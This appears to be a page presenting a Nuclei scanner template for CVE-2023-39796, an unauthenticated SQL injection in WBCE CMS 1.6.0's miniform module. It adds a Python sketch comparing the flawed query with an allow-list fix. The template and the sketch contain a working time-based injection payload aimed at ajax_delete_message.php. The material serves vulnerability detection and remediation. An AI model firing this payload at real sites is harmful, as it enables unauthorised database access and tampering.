WBCE 1.6.0 - SQL Injection
ID: CVE-2023-39796
Severity: critical
Author: youngpope
Tags: time-based-sqli,cve,cve2023,sqli,wbce,intrusive
Description
There is an SQL injection vulnerability in the “miniform” module, a default module installed with WBCE CMS. The injection is unauthenticated, so anyone who can reach the endpoint can exploit it and take over the whole database. The file “/modules/miniform/ajax_delete_message.php” performs no authentication check, and the DELETE query on line 40 of that file is vulnerable: an attacker can break out of the query using the backtick character (`).
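The flaw described here comes down to request values being placed between backticks as table and column names, so a backtick inside DB_RECORD_TABLE ends the identifier early. The following Python example is added for illustration and is not WBCE's code or the 1.6.1 patch: it models that pattern next to a hardened version. The query shape, the allow-list contents and the function names are assumptions; the parameter names come from this page's template request body.

```python
from urllib.parse import parse_qs

# Assumption: allow-list of table -> columns that may be used as the delete key.
# The two names come from the template's request body; a real site lists its own.
ALLOWED = {"miniform_data": {"message_id"}}


def _fields(body: str) -> dict:
    """Decode a urlencoded POST body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def unsafe_delete(body: str) -> str:
    """Constructed model of the flaw: request values pasted between backticks."""
    f = _fields(body)
    return ("DELETE FROM `" + f["DB_RECORD_TABLE"] + "` WHERE `"
            + f["DB_COLUMN"] + "` = " + f["iRecordID"])


def safe_delete(body: str) -> tuple:
    """Identifiers must be on the allow-list; the record id is a bound integer."""
    f = _fields(body)
    table, column = f.get("DB_RECORD_TABLE", ""), f.get("DB_COLUMN", "")
    if column not in ALLOWED.get(table, ()):
        raise ValueError(f"identifier not allowed: {table!r}.{column!r}")
    try:
        record_id = int(f.get("iRecordID", ""))
    except ValueError:
        raise ValueError("iRecordID is not an integer") from None
    # %s is the placeholder style used by common Python MySQL drivers.
    return f"DELETE FROM `{table}` WHERE `{column}` = %s", (record_id,)


# Request body from this page's Nuclei template, and a constructed benign request.
PROBE = ("action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+"
         "(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1"
         "&DB_COLUMN=message_id&MODULE=&purpose=delete_record")
BENIGN = "action=delete&DB_RECORD_TABLE=miniform_data&iRecordID=1&DB_COLUMN=message_id"

if __name__ == "__main__":
    print(unsafe_delete(PROBE))   # the backtick closes the identifier early
    print(safe_delete(BENIGN))
    try:
        safe_delete(PROBE)
    except ValueError as exc:
        print("rejected:", exc)
```

Because identifiers cannot be sent as bound parameters, the allow-list is what protects the table and column names; binding only covers the record id.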
YAML Source
id: CVE-2023-39796

info:
  name: WBCE 1.6.0 - SQL Injection
  author: youngpope
  severity: critical
  description: |
    There is an sql injection vulnerability in "miniform module" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file "/modules/miniform/ajax_delete_message.php" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.
  remediation: Fixed in version 1.6.1
  reference:
    - https://forum.wbce.org/viewtopic.php?pid=42046#p42046
    - https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
    - https://pastebin.com/PBw5AvGp
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-39796
    cwe-id: CWE-89
    epss-score: 0.05018
    epss-percentile: 0.92857
    cpe: cpe:2.3:a:wbce:wbce_cms:1.6.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wbce
    product: wbce_cms
  tags: time-based-sqli,cve,cve2023,sqli,wbce,intrusive

http:
  - raw:
      - |
        @timeout: 20s
        POST /modules/miniform/ajax_delete_message.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code_1 == 200'
          - 'contains(body, "Record deleted successfully!")'
        condition: and
# digest: 4a0a004730450221009a866409b4da788db867ccd8fbb33d9708e20222726167f774e26035c2d199010220565cf72373fae6203820195222484da09428bbad9bb15a9d585309e345a67f1d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-39796.yaml"